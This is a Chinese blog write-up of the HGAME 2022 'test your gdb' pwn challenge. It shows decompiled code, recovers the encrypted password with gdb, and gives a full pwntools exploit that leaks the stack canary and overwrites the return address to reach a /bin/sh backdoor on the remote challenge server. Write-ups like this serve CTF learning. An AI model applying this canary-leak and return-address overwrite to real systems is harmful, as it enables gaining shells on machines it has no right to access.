[HGAME 2022 week1]test your gdb

已于 2023-03-14 14:12:05 修改
阅读量358 收藏 4
点赞数 2
分类专栏: Pwn 文章标签: 安全 网络 网络安全 python Powered by 金山文档
于 2023-03-06 14:15:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/129360738
版权

Checksec & IDA

int __cdecl main(int argc, const char **argv, const char **envp)
{
  pthread_t newthread[2]; // [rsp+0h] [rbp-10h] BYREF

  newthread[1] = __readfsqword(0x28u);
  pthread_create(newthread, 0LL, (void *(*)(void *))work, 0LL);
  pthread_join(newthread[0], 0LL);
  return 0;
}
unsigned __int64 __fastcall work(void *a1)
{
  char v2[256]; // [rsp+0h] [rbp-150h] BYREF
  __int64 v3[2]; // [rsp+100h] [rbp-50h] BYREF
  __int64 s2[2]; // [rsp+110h] [rbp-40h] BYREF
  char buf[16]; // [rsp+120h] [rbp-30h] BYREF
  char v6[24]; // [rsp+130h] [rbp-20h] BYREF
  unsigned __int64 v7; // [rsp+148h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  v3[0] = 0xBA0033020LL;
  v3[1] = 0xC0000000D00000CLL;
  s2[0] = 0x706050403020100LL;
  s2[1] = 0xF0E0D0C0B0A0908LL;
  SEED_KeySchedKey(v2, v3);
  SEED_Encrypt(s2, v2);
  init_io();
  puts("hopefully you have used checksec");
  puts("enter your pass word");
  read(0, buf, 0x10uLL);
  if ( !memcmp(buf, s2, 0x10uLL) )
  {
    write(1, v6, 0x100uLL);
    gets(v6);
  }
  else
  {
    read(0, v6, 0x10uLL);
  }
  return __readfsqword(0x28u) ^ v7;
}

首先分析源码:

main函数,个人理解是通过 pthread_create 函数创建并调用一个线程,创建的线程同等于 read(0,buf,0x28)。

这个buf通过 pthread_join 传递进了work函数,从而执行一系列其他函数。

word函数中,s2被加密,然后使用memcmp函数进行 buf 与 s2 的对比。如果 buf = s2 ,那么我们就可以利用栈溢出漏洞。

但是s2是加密的变量,因此我们需要通过gdb获取s2的内容。

首先把断点下在read函数之前,方便我们直接调试。

一路next直到 call memcmp

输入指令 x/8gx 0x7ffff7da0e10 可查询栈上对应地址内的内容。为什么是0x7ffff7da0e10呢?

因为memcmp那写着 s2 : 0x7ffff7da0e10

这两行就是0x7ffff7da0e10,也就是s2的内容。

接下来就是经典的ret2text了。

程序中埋藏了一个后门函数b4ckd00r,我们只需要调用即可。

int b4ckd00r()
{
  return execv("/bin/sh", 0LL);
}

第一步:获取Canary的值:

我们可以使用一个足以溢出但是不溢出Canary的Payload即可获取Canary的值。

也就是 RBP - 0x08 大小的Padding。

Padding = b'A' * (0x20 - 0x08)

第二步:构造Exp:

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

#io = process('./service')
io = remote("1.14.71.254",28776)
elf = ELF('./service')

v2 = p64(0xb0361e0e8294f147) + p64(0x8c09e0c34ed8a6a9)
backdoor = 0x401256
Padding = b'A' * (0x20 - 0x08)

io.recvuntil(b'word\n')
io.send(v2)
io.recv(0x18)

Canary = u64(io.recv(8))

log.success("Canary: " + (hex(Canary)))

Payload_Shell = Padding + p64(Canary) + p64(0) + p64(backdoor)
io.sendline(Payload_Shell)
io.interactive()

解释一下为什么需要recv(0x18)

因为

我们发送了16个字节的v2,也就是0x10大小的v2,我们还需要接收0x18大小的垃圾数据,之后的0x08才是我们的Canary。

p64(0) 是ROP链的返回地址,理论上填什么都行。

注意:一定不能使用sendline(v2),因为sendline会添加换行符,而read只接受16个字符,v2已经16个字符了。

Red-Leaves
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
HGAME cdcollector-开源
04-24
这是现有项目cdcollector的mod,用于为拥有过多数据库的人使用phpmysql存储您的HGAMES数据库。
hgame2022-week1
网安小菜鸡
01-15 4366
hgame2022-week1 wp(部分)
hgame 2022 week1
zip471642048的博客
02-09 864
Crypto Dancing Line 八位二进制走线图→=0 ↓=1 转ASCII码 exp from PIL import Image img = Image.open('Dancing Line.bmp') width,height = img.size pix_list = [[] for i in range(136)] for w in range(width): for h in range(height): pix = img.getpixel((w,h))
PWN-COMPETITION-HGAME2022-Week1
P1umH0的博客
01-28 1245
PWN-COMPETITION-HGAME2022Week1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orw(unsolved)ser_per_fa(unsol)test_your_nctest_your_gdb Week1 enter_the_pwn_land 栈溢出,需要注意的是下标 i 的地址比输入s的地址更高 s溢出会覆盖 i ,于是需要小心地覆写 i 的值,让循环顺利执行下去 然后就是常规的ret2libc # -*- coding:
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 620
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
hgame 2022 PWN 部分题目 Writeup
02-18 3326
hgame 2022 pwn 部分题目writeup
hgame:Haskell 游戏引擎
05-30
游戏 Haskell 游戏引擎
单表替换密码算法破解工具
01-15
网络密码中介绍的基本加密方法,与凯撒密码相似,该软件提供基本的替换功能
0hgame:用0h制作的游戏->阅读README
05-01
(对于那些谁是它asceptical, ) 规则: 1- No one talk about fight club (?)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king ...
HGAME 2022 Writeup
m0_67400973的博客
03-08 2429
文章目录 Level - Week1 WEB easy_auth 蛛蛛…嘿嘿?我的蛛蛛 Tetris plus Fujiwara Tofu Shop MISC 欢迎欢迎!热烈欢迎! 这个压缩包有点麻烦 好康的流量 群青(其实是幽灵东京) CRYPTO Dancing Line Matryoshka English Novel Level - Week2 WEB Apache! webpack-engine At0m的留言板 一本单词书 Pokemon MISC
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装
最新发布
qq_43684686的博客
06-17 87
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装。重新执行安装程安装到 d:\a-vm。在D盘新建一个文件夹a-vm,
MVC 框架安全
A526847的博客
06-17 456
举例来说,在“注入攻击”一章中,我们并没有使用 PHP 的 magic_quotes_gpc 作为一项 对抗 SQL 注入的防御方案,这是因为 magic_quotes_gpc 是有缺陷的,它并没有在正确的地方 解决问题。其次,对于一些常见的漏洞来说,由程序员一个个修补可能会出现遗漏,而在框架中统一 解决,有可能解决“遗漏”的问题。最后,在每个业务里修补安全漏洞,补丁的标准难以统一,而在框架中集中实施的安全方 案,可以使所有基于框架开发的业务都能受益,从安全方案的有效性来说,更容易把握。
如何确保数据跨域交换安全、合规、可追溯性?
文件数据安全交换
06-14 543
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
《软件定义安全》之八:软件定义安全案例
大龄IT民工
06-13 1224
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
Java中的安全管理器和权限控制
weixin_53840353的博客
06-13 638
Java安全管理器是一种允许应用程序在运行时检查对系统资源(如文件和网络)的访问权限的机制。通过定义和安装自定义的安全策略,程序员可以控制哪些代码能够执行特定的操作,从而保护系统资源的安全。@Override// 自定义安全策略throw new SecurityException("写文件操作被禁止!");try {// 尝试写文件操作System.err.println("安全异常:" + e.getMessage());在这个示例中,自定义的禁止所有文件写操作。
NTFS安全权限
2302_80097039的博客
06-12 751
NTFS权限是基于。
Veeam Backup Enterprise Manager身份验证绕过漏洞(CVE-2024-29849)
lujiawei00的专栏
06-11 585
对于无法立即将 Veeam Backup Enterprise Manager 升级到 12.1.2.172 的客户,可执行以下缓解措施: 1.通过停止 Veeam Backup Enterprise Manager 软件来缓解该漏洞,可停止并禁用以下服务(禁用服务不会阻止安装 12.1.2 更新,但更新后需要将服务重置回自动启动):
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加了从指定文件夹获取图片的功能: ```python import os from PIL import Image def get_images_from_folder(folder_path): images = [] for filename in os.listdir(folder_path): if filename.endswith(".png"): image_path = os.path.join(folder_path, filename) image = Image.open(image_path) images.append(image) return images # 指定文件夹路径 folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值